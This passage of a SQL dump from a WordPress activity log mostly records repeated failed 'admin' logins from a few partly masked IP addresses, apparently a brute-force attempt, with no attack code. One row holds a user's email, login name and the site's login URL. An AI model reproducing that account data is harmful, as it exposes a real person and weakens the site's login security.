177,'_message_key','user_unknown_login_failed'),(218920,36177,'_server_remote_addr','45.136.118.x'),(218921,36178,'failed_username','admin'),(218922,36178,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36'),(218923,36178,'_message_key','user_unknown_login_failed'),(218924,36178,'_server_remote_addr','210.207.92.x'),(218925,36179,'failed_username','admin'),(218926,36179,'server_http_user_agent','Mozilla/5.0'),(218927,36179,'_message_key','user_unknown_login_failed'),(218928,36179,'_server_remote_addr','45.136.118.x'),(218929,36180,'failed_username','admin'),(218930,36180,'server_http_user_agent','Mozilla/5.0'),(218931,36180,'_message_key','user_unknown_login_failed'),(218932,36180,'_server_remote_addr','45.136.118.x'),(218933,36181,'failed_username','admin'),(218934,36181,'server_http_user_agent','Mozilla/5.0'),(218935,36181,'_message_key','user_unknown_login_failed'),(218936,36181,'_server_remote_addr','45.136.118.x'),(218937,36182,'failed_username','admin'),(218938,36182,'server_http_user_agent','Mozilla/5.0'),(218939,36182,'_message_key','user_unknown_login_failed'),(218940,36182,'_server_remote_addr','45.136.118.x'),(218941,36183,'failed_username','admin'),(218942,36183,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36'),(218943,36183,'_message_key','user_unknown_login_failed'),(218944,36183,'_server_remote_addr','89.39.109.x'),(218945,36184,'failed_username','admin'),(218946,36184,'server_http_user_agent','Mozilla/5.0'),(218947,36184,'_message_key','user_unknown_login_failed'),(218948,36184,'_server_remote_addr','45.136.118.x'),(218949,36185,'failed_username','admin'),(218950,36185,'server_http_user_agent','Mozilla/5.0'),(218951,36185,'_message_key','user_unknown_login_failed'),(218952,36185,'_server_remote_addr','45.136.118.x'),(218953,36186,'failed_username','admin'),(218954,36186,'server_http_user_agent','Mozilla/5.0'),(218955,36186,'_message_key','user_unknown_login_failed'),(218956,36186,'_server_remote_addr','45.136.118.x'),(218957,36187,'failed_username','admin'),(218958,36187,'server_http_user_agent','Mozilla/5.0'),(218959,36187,'_message_key','user_unknown_login_failed'),(218960,36187,'_server_remote_addr','45.136.118.x'),(218961,36188,'failed_username','admin'),(218962,36188,'server_http_user_agent','Mozilla/5.0'),(218963,36188,'_message_key','user_unknown_login_failed'),(218964,36188,'_server_remote_addr','45.136.118.x'),(218965,36189,'failed_username','admin'),(218966,36189,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),(218967,36189,'_message_key','user_unknown_login_failed'),(218968,36189,'_server_remote_addr','20.92.138.x'),(218969,36190,'failed_username','admin'),(218970,36190,'server_http_user_agent','Mozilla/5.0'),(218971,36190,'_message_key','user_unknown_login_failed'),(218972,36190,'_server_remote_addr','45.136.118.x'),(218973,36191,'failed_username','admin'),(218974,36191,'server_http_user_agent','Mozilla/5.0'),(218975,36191,'_message_key','user_unknown_login_failed'),(218976,36191,'_server_remote_addr','45.136.118.x'),(218977,36192,'failed_username','admin'),(218978,36192,'server_http_user_agent','Mozilla/5.0'),(218979,36192,'_message_key','user_unknown_login_failed'),(218980,36192,'_server_remote_addr','45.136.118.x'),(218981,36193,'failed_username','admin'),(218982,36193,'server_http_user_agent','Mozilla/5.0'),(218983,36193,'_message_key','user_unknown_login_failed'),(218984,36193,'_server_remote_addr','45.136.118.x'),(218985,36194,'failed_username','admin'),(218986,36194,'server_http_user_agent','Mozilla/5.0'),(218987,36194,'_message_key','user_unknown_login_failed'),(218988,36194,'_server_remote_addr','45.136.118.x'),(218989,36195,'failed_username','admin'),(218990,36195,'server_http_user_agent','Mozilla/5.0'),(218991,36195,'_message_key','user_unknown_login_failed'),(218992,36195,'_server_remote_addr','45.136.118.x'),(218993,36196,'failed_username','admin'),(218994,36196,'server_http_user_agent','Mozilla/5.0'),(218995,36196,'_message_key','user_unknown_login_failed'),(218996,36196,'_server_remote_addr','45.136.118.x'),(218997,36197,'failed_username','admin'),(218998,36197,'server_http_user_agent','Mozilla/5.0'),(218999,36197,'_message_key','user_unknown_login_failed'),(219000,36197,'_server_remote_addr','45.136.118.x'),(219001,36198,'failed_username','admin'),(219002,36198,'server_http_user_agent','Mozilla/5.0'),(219003,36198,'_message_key','user_unknown_login_failed'),(219004,36198,'_server_remote_addr','45.136.118.x'),(219005,36199,'failed_username','admin'),(219006,36199,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36'),(219007,36199,'_message_key','user_unknown_login_failed'),(219008,36199,'_server_remote_addr','111.230.202.x'),(219009,36200,'failed_username','admin'),(219010,36200,'server_http_user_agent','Mozilla/5.0'),(219011,36200,'_message_key','user_unknown_login_failed'),(219012,36200,'_server_remote_addr','45.136.118.x'),(219013,36201,'failed_username','admin'),(219014,36201,'server_http_user_agent','Mozilla/5.0'),(219015,36201,'_message_key','user_unknown_login_failed'),(219016,36201,'_server_remote_addr','20.205.9.x'),(219017,36202,'failed_username','admin'),(219018,36202,'server_http_user_agent','Mozilla/5.0'),(219019,36202,'_message_key','user_unknown_login_failed'),(219020,36202,'_server_remote_addr','45.136.118.x'),(219021,36203,'failed_username','admin'),(219022,36203,'server_http_user_agent','Mozilla/5.0'),(219023,36203,'_message_key','user_unknown_login_failed'),(219024,36203,'_server_remote_addr','20.205.9.x'),(219025,36204,'failed_username','admin'),(219026,36204,'server_http_user_agent','Mozilla/5.0'),(219027,36204,'_message_key','user_unknown_login_failed'),(219028,36204,'_server_remote_addr','45.136.118.x'),(219029,36205,'failed_username','admin'),(219030,36205,'server_http_user_agent','Mozilla/5.0'),(219031,36205,'_message_key','user_unknown_login_failed'),(219032,36205,'_server_remote_addr','20.205.9.x'),(219033,36206,'failed_username','admin'),(219034,36206,'server_http_user_agent','Mozilla/5.0'),(219035,36206,'_message_key','user_unknown_login_failed'),(219036,36206,'_server_remote_addr','45.136.118.x'),(219037,36207,'failed_username','admin'),(219038,36207,'server_http_user_agent','Mozilla/5.0'),(219039,36207,'_message_key','user_unknown_login_failed'),(219040,36207,'_server_remote_addr','20.205.9.x'),(219041,36208,'failed_username','admin'),(219042,36208,'server_http_user_agent','Mozilla/5.0'),(219043,36208,'_message_key','user_unknown_login_failed'),(219044,36208,'_server_remote_addr','45.136.118.x'),(219045,36209,'failed_username','admin'),(219046,36209,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.167 Safari/537.36'),(219047,36209,'_message_key','user_unknown_login_failed'),(219048,36209,'_server_remote_addr','157.230.191.x'),(219049,36210,'failed_username','admin'),(219050,36210,'server_http_user_agent','Mozilla/5.0'),(219051,36210,'_message_key','user_unknown_login_failed'),(219052,36210,'_server_remote_addr','20.205.9.x'),(219053,36211,'failed_username','admin'),(219054,36211,'server_http_user_agent','Mozilla/5.0'),(219055,36211,'_message_key','user_unknown_login_failed'),(219056,36211,'_server_remote_addr','45.136.118.x'),(219057,36212,'failed_username','admin'),(219058,36212,'server_http_user_agent','Mozilla/5.0'),(219059,36212,'_message_key','user_unknown_login_failed'),(219060,36212,'_server_remote_addr','20.205.9.x'),(219061,36213,'failed_username','admin'),(219062,36213,'server_http_user_agent','Mozilla/5.0'),(219063,36213,'_message_key','user_unknown_login_failed'),(219064,36213,'_server_remote_addr','45.136.118.x'),(219065,36214,'failed_username','admin'),(219066,36214,'server_http_user_agent','Mozilla/5.0'),(219067,36214,'_message_key','user_unknown_login_failed'),(219068,36214,'_server_remote_addr','20.205.9.x'),(219069,36215,'failed_username','admin'),(219070,36215,'server_http_user_agent','Mozilla/5.0'),(219071,36215,'_message_key','user_unknown_login_failed'),(219072,36215,'_server_remote_addr','20.205.9.x'),(219073,36216,'failed_username','admin'),(219074,36216,'server_http_user_agent','Mozilla/5.0'),(219075,36216,'_message_key','user_unknown_login_failed'),(219076,36216,'_server_remote_addr','45.136.118.x'),(219077,36217,'failed_username','admin'),(219078,36217,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(219079,36217,'_message_key','user_unknown_login_failed'),(219080,36217,'_server_remote_addr','138.2.24.x'),(219081,36218,'failed_username','admin'),(219082,36218,'server_http_user_agent','Mozilla/5.0'),(219083,36218,'_message_key','user_unknown_login_failed'),(219084,36218,'_server_remote_addr','20.205.9.x'),(219085,36219,'failed_username','admin'),(219086,36219,'server_http_user_agent','Mozilla/5.0'),(219087,36219,'_message_key','user_unknown_login_failed'),(219088,36219,'_server_remote_addr','45.136.118.x'),(219089,36220,'failed_username','admin'),(219090,36220,'server_http_user_agent','Mozilla/5.0'),(219091,36220,'_message_key','user_unknown_login_failed'),(219092,36220,'_server_remote_addr','45.136.118.x'),(219093,36221,'failed_username','admin'),(219094,36221,'server_http_user_agent','Mozilla/5.0'),(219095,36221,'_message_key','user_unknown_login_failed'),(219096,36221,'_server_remote_addr','20.205.9.x'),(219097,36222,'failed_username','admin'),(219098,36222,'server_http_user_agent','Mozilla/5.0'),(219099,36222,'_message_key','user_unknown_login_failed'),(219100,36222,'_server_remote_addr','45.136.118.x'),(219101,36223,'failed_username','admin'),(219102,36223,'server_http_user_agent','Mozilla/5.0'),(219103,36223,'_message_key','user_unknown_login_failed'),(219104,36223,'_server_remote_addr','20.205.9.x'),(219105,36224,'failed_username','admin'),(219106,36224,'server_http_user_agent','Mozilla/5.0'),(219107,36224,'_message_key','user_unknown_login_failed'),(219108,36224,'_server_remote_addr','45.136.118.x'),(219109,36225,'failed_username','admin'),(219110,36225,'server_http_user_agent','Mozilla/5.0'),(219111,36225,'_message_key','user_unknown_login_failed'),(219112,36225,'_server_remote_addr','20.205.9.x'),(219113,36226,'failed_username','admin'),(219114,36226,'server_http_user_agent','Mozilla/5.0'),(219115,36226,'_message_key','user_unknown_login_failed'),(219116,36226,'_server_remote_addr','45.136.118.x'),(219117,36227,'failed_username','admin'),(219118,36227,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36'),(219119,36227,'_message_key','user_unknown_login_failed'),(219120,36227,'_server_remote_addr','133.130.103.x'),(219121,36228,'failed_username','admin'),(219122,36228,'server_http_user_agent','Mozilla/5.0'),(219123,36228,'_message_key','user_unknown_login_failed'),(219124,36228,'_server_remote_addr','20.205.9.x'),(219125,36229,'failed_username','admin'),(219126,36229,'server_http_user_agent','Mozilla/5.0'),(219127,36229,'_message_key','user_unknown_login_failed'),(219128,36229,'_server_remote_addr','45.136.118.x'),(219129,36230,'failed_username','admin'),(219130,36230,'server_http_user_agent','Mozilla/5.0'),(219131,36230,'_message_key','user_unknown_login_failed'),(219132,36230,'_server_remote_addr','20.205.9.x'),(219133,36231,'failed_username','admin'),(219134,36231,'server_http_user_agent','Mozilla/5.0'),(219135,36231,'_message_key','user_unknown_login_failed'),(219136,36231,'_server_remote_addr','45.136.118.x'),(219137,36232,'failed_username','admin'),(219138,36232,'server_http_user_agent','Mozilla/5.0'),(219139,36232,'_message_key','user_unknown_login_failed'),(219140,36232,'_server_remote_addr','20.205.9.x'),(219141,36233,'failed_username','admin'),(219142,36233,'server_http_user_agent','Mozilla/5.0'),(219143,36233,'_message_key','user_unknown_login_failed'),(219144,36233,'_server_remote_addr','45.136.118.x'),(219145,36234,'failed_username','admin'),(219146,36234,'server_http_user_agent','Mozilla/5.0'),(219147,36234,'_message_key','user_unknown_login_failed'),(219148,36234,'_server_remote_addr','20.205.9.x'),(219149,36235,'failed_username','admin'),(219150,36235,'server_http_user_agent','Mozilla/5.0'),(219151,36235,'_message_key','user_unknown_login_failed'),(219152,36235,'_server_remote_addr','45.136.118.x'),(219153,36236,'failed_username','admin'),(219154,36236,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.167 Safari/537.36'),(219155,36236,'_message_key','user_unknown_login_failed'),(219156,36236,'_server_remote_addr','23.97.205.x'),(219157,36237,'failed_username','admin'),(219158,36237,'server_http_user_agent','Mozilla/5.0'),(219159,36237,'_message_key','user_unknown_login_failed'),(219160,36237,'_server_remote_addr','20.205.9.x'),(219161,36238,'failed_username','admin'),(219162,36238,'server_http_user_agent','Mozilla/5.0'),(219163,36238,'_message_key','user_unknown_login_failed'),(219164,36238,'_server_remote_addr','45.136.118.x'),(219165,36239,'failed_username','admin'),(219166,36239,'server_http_user_agent','Mozilla/5.0'),(219167,36239,'_message_key','user_unknown_login_failed'),(219168,36239,'_server_remote_addr','45.136.118.x'),(219169,36240,'failed_username','admin'),(219170,36240,'server_http_user_agent','Mozilla/5.0'),(219171,36240,'_message_key','user_unknown_login_failed'),(219172,36240,'_server_remote_addr','20.205.9.x'),(219173,36241,'failed_username','admin'),(219174,36241,'server_http_user_agent','Mozilla/5.0'),(219175,36241,'_message_key','user_unknown_login_failed'),(219176,36241,'_server_remote_addr','45.136.118.x'),(219177,36242,'failed_username','admin'),(219178,36242,'server_http_user_agent','Mozilla/5.0'),(219179,36242,'_message_key','user_unknown_login_failed'),(219180,36242,'_server_remote_addr','20.205.9.x'),(219181,36243,'failed_username','admin'),(219182,36243,'server_http_user_agent','Mozilla/5.0'),(219183,36243,'_message_key','user_unknown_login_failed'),(219184,36243,'_server_remote_addr','45.136.118.x'),(219185,36244,'failed_username','admin'),(219186,36244,'server_http_user_agent','Mozilla/5.0'),(219187,36244,'_message_key','user_unknown_login_failed'),(219188,36244,'_server_remote_addr','20.205.9.x'),(219189,36245,'failed_username','admin'),(219190,36245,'server_http_user_agent','Mozilla/5.0'),(219191,36245,'_message_key','user_unknown_login_failed'),(219192,36245,'_server_remote_addr','45.136.118.x'),(219193,36246,'failed_username','admin'),(219194,36246,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'),(219195,36246,'_message_key','user_unknown_login_failed'),(219196,36246,'_server_remote_addr','94.245.105.x'),(219197,36247,'failed_username','admin'),(219198,36247,'server_http_user_agent','Mozilla/5.0'),(219199,36247,'_message_key','user_unknown_login_failed'),(219200,36247,'_server_remote_addr','20.205.9.x'),(219201,36248,'failed_username','admin'),(219202,36248,'server_http_user_agent','Mozilla/5.0'),(219203,36248,'_message_key','user_unknown_login_failed'),(219204,36248,'_server_remote_addr','45.136.118.x'),(219205,36249,'failed_username','admin'),(219206,36249,'server_http_user_agent','Mozilla/5.0'),(219207,36249,'_message_key','user_unknown_login_failed'),(219208,36249,'_server_remote_addr','20.205.9.x'),(219209,36250,'failed_username','admin'),(219210,36250,'server_http_user_agent','Mozilla/5.0'),(219211,36250,'_message_key','user_unknown_login_failed'),(219212,36250,'_server_remote_addr','45.136.118.x'),(219213,36251,'failed_username','admin'),(219214,36251,'server_http_user_agent','Mozilla/5.0'),(219215,36251,'_message_key','user_unknown_login_failed'),(219216,36251,'_server_remote_addr','20.205.9.x'),(219217,36252,'failed_username','admin'),(219218,36252,'server_http_user_agent','Mozilla/5.0'),(219219,36252,'_message_key','user_unknown_login_failed'),(219220,36252,'_server_remote_addr','45.136.118.x'),(219221,36253,'failed_username','admin'),(219222,36253,'server_http_user_agent','Mozilla/5.0'),(219223,36253,'_message_key','user_unknown_login_failed'),(219224,36253,'_server_remote_addr','20.205.9.x'),(219225,36254,'failed_username','admin'),(219226,36254,'server_http_user_agent','Mozilla/5.0'),(219227,36254,'_message_key','user_unknown_login_failed'),(219228,36254,'_server_remote_addr','45.136.118.x'),(219229,36255,'failed_username','admin'),(219230,36255,'server_http_user_agent','Mozilla/5.0'),(219231,36255,'_message_key','user_unknown_login_failed'),(219232,36255,'_server_remote_addr','20.205.9.x'),(219233,36256,'failed_username','admin'),(219234,36256,'server_http_user_agent','Mozilla/5.0'),(219235,36256,'_message_key','user_unknown_login_failed'),(219236,36256,'_server_remote_addr','45.136.118.x'),(219237,36257,'failed_username','admin'),(219238,36257,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36'),(219239,36257,'_message_key','user_unknown_login_failed'),(219240,36257,'_server_remote_addr','35.187.58.x'),(219241,36258,'failed_username','admin'),(219242,36258,'server_http_user_agent','Mozilla/5.0'),(219243,36258,'_message_key','user_unknown_login_failed'),(219244,36258,'_server_remote_addr','20.205.9.x'),(219245,36259,'failed_username','admin'),(219246,36259,'server_http_user_agent','Mozilla/5.0'),(219247,36259,'_message_key','user_unknown_login_failed'),(219248,36259,'_server_remote_addr','45.136.118.x'),(219249,36260,'failed_username','admin'),(219250,36260,'server_http_user_agent','Mozilla/5.0'),(219251,36260,'_message_key','user_unknown_login_failed'),(219252,36260,'_server_remote_addr','20.205.9.x'),(219253,36261,'failed_username','admin'),(219254,36261,'server_http_user_agent','Mozilla/5.0'),(219255,36261,'_message_key','user_unknown_login_failed'),(219256,36261,'_server_remote_addr','45.136.118.x'),(219257,36262,'failed_username','admin'),(219258,36262,'server_http_user_agent','Mozilla/5.0'),(219259,36262,'_message_key','user_unknown_login_failed'),(219260,36262,'_server_remote_addr','45.136.118.x'),(219261,36263,'failed_username','admin'),(219262,36263,'server_http_user_agent','Mozilla/5.0'),(219263,36263,'_message_key','user_unknown_login_failed'),(219264,36263,'_server_remote_addr','20.205.9.x'),(219265,36264,'failed_username','admin'),(219266,36264,'server_http_user_agent','Mozilla/5.0'),(219267,36264,'_message_key','user_unknown_login_failed'),(219268,36264,'_server_remote_addr','45.136.118.x'),(219269,36265,'failed_username','admin'),(219270,36265,'server_http_user_agent','Mozilla/5.0'),(219271,36265,'_message_key','user_unknown_login_failed'),(219272,36265,'_server_remote_addr','20.205.9.x'),(219273,36266,'failed_username','admin'),(219274,36266,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36'),(219275,36266,'_message_key','user_unknown_login_failed'),(219276,36266,'_server_remote_addr','52.140.17.x'),(219277,36267,'failed_username','admin'),(219278,36267,'server_http_user_agent','Mozilla/5.0'),(219279,36267,'_message_key','user_unknown_login_failed'),(219280,36267,'_server_remote_addr','45.136.118.x'),(219281,36268,'failed_username','admin'),(219282,36268,'server_http_user_agent','Mozilla/5.0'),(219283,36268,'_message_key','user_unknown_login_failed'),(219284,36268,'_server_remote_addr','20.205.9.x'),(219285,36269,'failed_username','admin'),(219286,36269,'server_http_user_agent','Mozilla/5.0'),(219287,36269,'_message_key','user_unknown_login_failed'),(219288,36269,'_server_remote_addr','45.136.118.x'),(219289,36270,'failed_username','admin'),(219290,36270,'server_http_user_agent','Mozilla/5.0'),(219291,36270,'_message_key','user_unknown_login_failed'),(219292,36270,'_server_remote_addr','20.205.9.x'),(219293,36271,'failed_username','admin'),(219294,36271,'server_http_user_agent','Mozilla/5.0'),(219295,36271,'_message_key','user_unknown_login_failed'),(219296,36271,'_server_remote_addr','45.136.118.x'),(219297,36272,'failed_username','admin'),(219298,36272,'server_http_user_agent','Mozilla/5.0'),(219299,36272,'_message_key','user_unknown_login_failed'),(219300,36272,'_server_remote_addr','20.205.9.x'),(219301,36273,'failed_username','admin'),(219302,36273,'server_http_user_agent','Mozilla/5.0'),(219303,36273,'_message_key','user_unknown_login_failed'),(219304,36273,'_server_remote_addr','45.136.118.x'),(219305,36274,'failed_username','admin'),(219306,36274,'server_http_user_agent','Mozilla/5.0'),(219307,36274,'_message_key','user_unknown_login_failed'),(219308,36274,'_server_remote_addr','20.205.9.x'),(219309,36275,'failed_username','admin'),(219310,36275,'server_http_user_agent','Mozilla/5.0'),(219311,36275,'_message_key','user_unknown_login_failed'),(219312,36275,'_server_remote_addr','45.136.118.x'),(219313,36276,'failed_username','admin'),(219314,36276,'server_http_user_agent','Mozilla/5.0'),(219315,36276,'_message_key','user_unknown_login_failed'),(219316,36276,'_server_remote_addr','20.205.9.x'),(219317,36277,'failed_username','admin'),(219318,36277,'server_http_user_agent','Mozilla/5.0'),(219319,36277,'_message_key','user_unknown_login_failed'),(219320,36277,'_server_remote_addr','45.136.118.x'),(219321,36278,'failed_username','wadminw'),(219322,36278,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36'),(219323,36278,'_message_key','user_unknown_login_failed'),(219324,36278,'_server_remote_addr','54.37.156.x'),(219325,36279,'failed_username','admin'),(219326,36279,'server_http_user_agent','Mozilla/5.0'),(219327,36279,'_message_key','user_unknown_login_failed'),(219328,36279,'_server_remote_addr','45.136.118.x'),(219329,36280,'failed_username','admin'),(219330,36280,'server_http_user_agent','Mozilla/5.0'),(219331,36280,'_message_key','user_unknown_login_failed'),(219332,36280,'_server_remote_addr','20.205.9.x'),(219333,36281,'failed_username','admin'),(219334,36281,'server_http_user_agent','Mozilla/5.0'),(219335,36281,'_message_key','user_unknown_login_failed'),(219336,36281,'_server_remote_addr','45.136.118.x'),(219337,36282,'failed_username','admin'),(219338,36282,'server_http_user_agent','Mozilla/5.0'),(219339,36282,'_message_key','user_unknown_login_failed'),(219340,36282,'_server_remote_addr','20.205.9.x'),(219341,36283,'failed_username','admin'),(219342,36283,'server_http_user_agent','Mozilla/5.0'),(219343,36283,'_message_key','user_unknown_login_failed'),(219344,36283,'_server_remote_addr','45.136.118.x'),(219345,36284,'failed_username','admin'),(219346,36284,'server_http_user_agent','Mozilla/5.0'),(219347,36284,'_message_key','user_unknown_login_failed'),(219348,36284,'_server_remote_addr','20.205.9.x'),(219349,36285,'failed_username','admin'),(219350,36285,'server_http_user_agent','Mozilla/5.0'),(219351,36285,'_message_key','user_unknown_login_failed'),(219352,36285,'_server_remote_addr','45.136.118.x'),(219353,36286,'failed_username','admin'),(219354,36286,'server_http_user_agent','Mozilla/5.0'),(219355,36286,'_message_key','user_unknown_login_failed'),(219356,36286,'_server_remote_addr','20.205.9.x'),(219357,36287,'failed_username','admin'),(219358,36287,'server_http_user_agent','Mozilla/5.0'),(219359,36287,'_message_key','user_unknown_login_failed'),(219360,36287,'_server_remote_addr','45.136.118.x'),(219361,36288,'failed_username','wwwadmin'),(219362,36288,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36'),(219363,36288,'_message_key','user_unknown_login_failed'),(219364,36288,'_server_remote_addr','13.79.17.x'),(219365,36289,'failed_username','admin'),(219366,36289,'server_http_user_agent','Mozilla/5.0'),(219367,36289,'_message_key','user_unknown_login_failed'),(219368,36289,'_server_remote_addr','20.205.9.x'),(219369,36290,'failed_username','admin'),(219370,36290,'server_http_user_agent','Mozilla/5.0'),(219371,36290,'_message_key','user_unknown_login_failed'),(219372,36290,'_server_remote_addr','45.136.118.x'),(219373,36291,'failed_username','admin'),(219374,36291,'server_http_user_agent','Mozilla/5.0'),(219375,36291,'_message_key','user_unknown_login_failed'),(219376,36291,'_server_remote_addr','20.205.9.x'),(219377,36292,'failed_username','admin'),(219378,36292,'server_http_user_agent','Mozilla/5.0'),(219379,36292,'_message_key','user_unknown_login_failed'),(219380,36292,'_server_remote_addr','45.136.118.x'),(219381,36293,'failed_username','admin'),(219382,36293,'server_http_user_agent','Mozilla/5.0'),(219383,36293,'_message_key','user_unknown_login_failed'),(219384,36293,'_server_remote_addr','20.205.9.x'),(219385,36294,'failed_username','admin'),(219386,36294,'server_http_user_agent','Mozilla/5.0'),(219387,36294,'_message_key','user_unknown_login_failed'),(219388,36294,'_server_remote_addr','45.136.118.x'),(219389,36295,'failed_username','admin'),(219390,36295,'server_http_user_agent','Mozilla/5.0'),(219391,36295,'_message_key','user_unknown_login_failed'),(219392,36295,'_server_remote_addr','45.136.118.x'),(219393,36296,'failed_username','admin'),(219394,36296,'server_http_user_agent','Mozilla/5.0'),(219395,36296,'_message_key','user_unknown_login_failed'),(219396,36296,'_server_remote_addr','20.205.9.x'),(219397,36297,'failed_username','admin'),(219398,36297,'server_http_user_agent','Mozilla/5.0'),(219399,36297,'_message_key','user_unknown_login_failed'),(219400,36297,'_server_remote_addr','45.136.118.x'),(219401,36298,'failed_username','admin'),(219402,36298,'server_http_user_agent','Mozilla/5.0'),(219403,36298,'_message_key','user_unknown_login_failed'),(219404,36298,'_server_remote_addr','20.205.9.x'),(219405,36299,'failed_username','admin'),(219406,36299,'server_http_user_agent','Mozilla/5.0'),(219407,36299,'_message_key','user_unknown_login_failed'),(219408,36299,'_server_remote_addr','45.136.118.x'),(219409,36300,'failed_username','admin'),(219410,36300,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(219411,36300,'_message_key','user_unknown_login_failed'),(219412,36300,'_server_remote_addr','115.245.68.x'),(219413,36301,'failed_username','admin'),(219414,36301,'server_http_user_agent','Mozilla/5.0'),(219415,36301,'_message_key','user_unknown_login_failed'),(219416,36301,'_server_remote_addr','20.205.9.x'),(219417,36302,'plugin_name','Simple History'),(219418,36302,'plugin_current_version','4.6.0'),(219419,36302,'plugin_new_version','4.7.0'),(219420,36302,'_message_key','plugin_update_available'),(219421,36302,'_server_remote_addr','173.231.231.x'),(219422,36303,'failed_username','admin'),(219423,36303,'server_http_user_agent','Mozilla/5.0'),(219424,36303,'_message_key','user_unknown_login_failed'),(219425,36303,'_server_remote_addr','45.136.118.x'),(219426,36304,'failed_username','admin'),(219427,36304,'server_http_user_agent','Mozilla/5.0'),(219428,36304,'_message_key','user_unknown_login_failed'),(219429,36304,'_server_remote_addr','20.205.9.x'),(219430,36305,'failed_username','admin'),(219431,36305,'server_http_user_agent','Mozilla/5.0'),(219432,36305,'_message_key','user_unknown_login_failed'),(219433,36305,'_server_remote_addr','45.136.118.x'),(219434,36306,'failed_username','admin'),(219435,36306,'server_http_user_agent','Mozilla/5.0'),(219436,36306,'_message_key','user_unknown_login_failed'),(219437,36306,'_server_remote_addr','20.205.9.x'),(219438,36307,'failed_username','admin'),(219439,36307,'server_http_user_agent','Mozilla/5.0'),(219440,36307,'_message_key','user_unknown_login_failed'),(219441,36307,'_server_remote_addr','45.136.118.x'),(219442,36308,'failed_username','admin'),(219443,36308,'server_http_user_agent','Mozilla/5.0'),(219444,36308,'_message_key','user_unknown_login_failed'),(219445,36308,'_server_remote_addr','20.205.9.x'),(219446,36309,'failed_username','admin'),(219447,36309,'server_http_user_agent','Mozilla/5.0'),(219448,36309,'_message_key','user_unknown_login_failed'),(219449,36309,'_server_remote_addr','45.136.118.x'),(219450,36310,'failed_username','admin'),(219451,36310,'server_http_user_agent','Mozilla/5.0'),(219452,36310,'_message_key','user_unknown_login_failed'),(219453,36310,'_server_remote_addr','20.205.9.x'),(219454,36311,'failed_username','admin'),(219455,36311,'server_http_user_agent','Mozilla/5.0'),(219456,36311,'_message_key','user_unknown_login_failed'),(219457,36311,'_server_remote_addr','45.136.118.x'),(219458,36312,'user_id','2'),(219459,36312,'user_email','nada@zipnadanot.org'),(219460,36312,'user_login','S8zhaBda'),(219461,36312,'_user_id','2'),(219462,36312,'_user_login','S8zhaBda'),(219463,36312,'_user_email','nada@zipnadanot.org'),(219464,36312,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0'),(219465,36312,'_message_key','user_logged_in'),(219466,36312,'_server_remote_addr','76.130.120.x'),(219467,36312,'_server_http_referer','https://eckankar-colorado.org/wp-login.php?redirect_to=https%3A%2F%2Fwww.eckankar-colorado.org%2Fwp-admin%2F&reauth=1'),(219468,36313,'failed_username','admin'),(219469,36313,'server_http_user_agent','Mozilla/5.0'),(219470,36313,'_message_key','user_unknown_login_failed'),(219471,36313,'_server_remote_addr','45.136.118.x'),(219472,36314,'failed_username','admin'),(219473,36314,'server_http_user_agent','Mozilla/5.0'),(219474,36314,'_message_key','user_unknown_login_failed'),(219475,36314,'_server_remote_addr','20.205.9.x'),(219476,36315,'failed_username','admin'),(219477,36315,'server_http_user_agent','Mozilla/5.0'),(219478,36315,'_message_key','user_unknown_login_failed'),(219479,36315,'_server_remote_addr','45.136.118.x'),(219480,36316,'failed_username','admin'),(219481,36316,'server_http_user_agent','Mozilla/5.0'),(219482,36316,'_message_key','user_unknown_login_failed'),(219483,36316,'_server_remote_addr','20.205.9.x'),(219484,36317,'failed_username','admin'),(219485,36317,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 